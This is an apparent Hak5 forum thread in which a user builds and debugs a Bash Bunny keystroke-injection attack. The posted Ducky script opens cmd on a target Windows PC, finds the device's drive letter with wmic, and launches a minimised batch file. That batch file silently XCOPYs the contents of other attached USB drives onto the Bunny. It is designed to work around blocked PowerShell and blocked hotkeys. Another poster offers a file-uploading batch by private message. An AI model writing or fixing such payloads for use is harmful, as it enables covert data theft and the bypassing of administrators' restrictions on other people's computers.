Natha_n Posted March 26, 2022 Share Posted March 26, 2022 I think the title is pretty self explanatory. I am looking to write a payload that executes a batch file located in the same directory. Thanks to those who will answer. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 27, 2022 Share Posted March 27, 2022 So, is this question related to the thread you have already started. If not, describe the scenario and any restrictions (such as not having access to PowerShell as I understand was the limitation in the other thread). Link to comment Share on other sites More sharing options...
Natha_n Posted March 27, 2022 Author Share Posted March 27, 2022 Yes it is linked to the other thread: I can't use powershell. I would like to know if there is a command in Bunny script to run a batch file. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 27, 2022 Share Posted March 27, 2022 Can you use wmic or is that a limitation as well on your target system? Link to comment Share on other sites More sharing options...
Natha_n Posted March 27, 2022 Author Share Posted March 27, 2022 Yes I can use wmic (I use or in m'y batch script). Just powershell.exe is blocked. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 27, 2022 Share Posted March 27, 2022 There is no command in Ducky script that I know of that can start a batch script on a Windows host. I guess that you want to store the batch script file that you have posted in the other thread on the Bunny, but you want to execute it in the perspective of the Windows target machine. In other words, the Windows target PC should start the bat file from the Bunny storage. To do this you need to get the drive letter of the Bunny (the way I showed you in the other thread), but not using PowerShell since that's a limitation in your target system. This is possible to do without PowerShell if using wmic. It's not that pretty, but it works. Link to comment Share on other sites More sharing options...
lightduty Posted March 27, 2022 Share Posted March 27, 2022 If the batch can be execute in one single line that you can execute cmd.exe /c --------------- This i know the folks at hak5.org don't know this trick but you can execute a batch that automatically will upload files from the machine or execute batch to get as much data as you can. (I have the source) pm me. Link to comment Share on other sites More sharing options...
Natha_n Posted March 27, 2022 Author Share Posted March 27, 2022 I wrote the payload.txt and the script.bat. Can you tell me if they are correct. For the payload I don't know how to use the switch position (I got it but I didn't use it after) payload.txt DUCKY_LANG us GET SWITCH_POSITION LED ATTACK ATTACKMODE HID STORAGE GUI DELAY 100 STRING cmd.exe ENTER DELAY 100 STRING for /f "tokens=2 delims==" %b IN ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') DO SET letter_BashBunny=%b ENTER STRING %letter_BashBunny% ENTER STRING cd %letter_BashBunny%\payloads\ ENTER STRING start /min script.bat ENTER STRING exit ENTER LED FINISH script.bat @echo off MKDIR %~dp0\copy_directory FOR /F "tokens=2 delims==" %%u IN ('wmic volume where "drivetype=2 and label<>'BashBunny'" get driveletter /format:list') DO ( SET usb_key=%%u XCOPY /C /Q /G /Y /E "%usb_key%" "%~d0\copy_directory\" ) Thaks for your replies ! Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 27, 2022 Share Posted March 27, 2022 Haven't you tried to run the payload? That will tell you if it's correct or not. Why would you want to use GET SWITCH_POSITION in this specific case? Link to comment Share on other sites More sharing options...
Natha_n Posted March 27, 2022 Author Share Posted March 27, 2022 I thought we had to get the switch position so that the bashbunny knows which payload to execute. Link to comment Share on other sites More sharing options...
dark_pyrro Posted March 27, 2022 Share Posted March 27, 2022 That is set the "hardware way" using the physical switch of the Bunny. In other words, if you put the Bunny in switch position 1, it will execute the payload in the switch1 directory. Link to comment Share on other sites More sharing options...
Natha_n Posted March 27, 2022 Author Share Posted March 27, 2022 Ok. Thanks. Link to comment Share on other sites More sharing options...
Natha_n Posted April 25, 2022 Author Share Posted April 25, 2022 Hi, After many attempts and a lot of reading on the subject, I don't understand why my payload does not work. Everything runs normally until you type the command in the cmd. command: Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b  If I do another command like cls it works. Do you have an idea ?  ATTACKMODE HID STORAGE LED R Q GUI Q DELAY 100 Q STRING cmd.exe Q ENTER Q DELAY 100 Q STRING for /f "tokens=2 delims==" %b in ('wmic volume where "Label='BashBunny' and DriveType=2" get DriveLetter /format:value') do set letter_BashBunny=%b Q ENTER Q DELAY 5 Q STRING %letter_BashBunny% Q ENTER Q DELAY 5 Q STRING cd %letter_BashBunny%\payloads\ Q ENTER Q DELAY5 Q STRING start /min script.bat Q ENTER Q DELAY 5 Q STRING exit Q ENTER LED G  Link to comment Share on other sites More sharing options...
dark_pyrro Posted April 25, 2022 Share Posted April 25, 2022 Why are you just using "Q GUI" and not "Q GUI r"? DELAY 5 is a really short delay, almost so short it's not worth putting it there. Even 100 can be short. You also have a DELAY5 that should be DELAY 5. Link to comment Share on other sites More sharing options...
Natha_n Posted April 25, 2022 Author Share Posted April 25, 2022 I can't use GUI r because hotkeys are blocked. I will try to lengthen the delay but from the first command, no text is entered in the cmd. Link to comment Share on other sites More sharing options...
dark_pyrro Posted April 25, 2022 Share Posted April 25, 2022 You most likely have to use quotes and escape special chars using \ to get that string to work Link to comment Share on other sites More sharing options...
Natha_n Posted April 26, 2022 Author Share Posted April 26, 2022 That's what I thought about doing but couldn't find any documentation on it. I put " " at the beginning and at the end but for the \ I use it for the " the ' ? the / ? Link to comment Share on other sites More sharing options...
dark_pyrro Posted April 26, 2022 Share Posted April 26, 2022 The Ducky script documentation is a bit scattered around according to me. If you use the Croc, that also use Ducky script, it's a bit easier to find since you most often remember that you have seen it somewhere. Payloads on GitHub may also be a source of knowledge. The Croc documentation has some info about escaping chars, not complete though as I see it, but always something. https://docs.hak5.org/key-croc/writing-payloads/advanced-quack-commands Other than that, it's all about trying. Trial and error has worked before in computing history and is still alive as a working method. Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.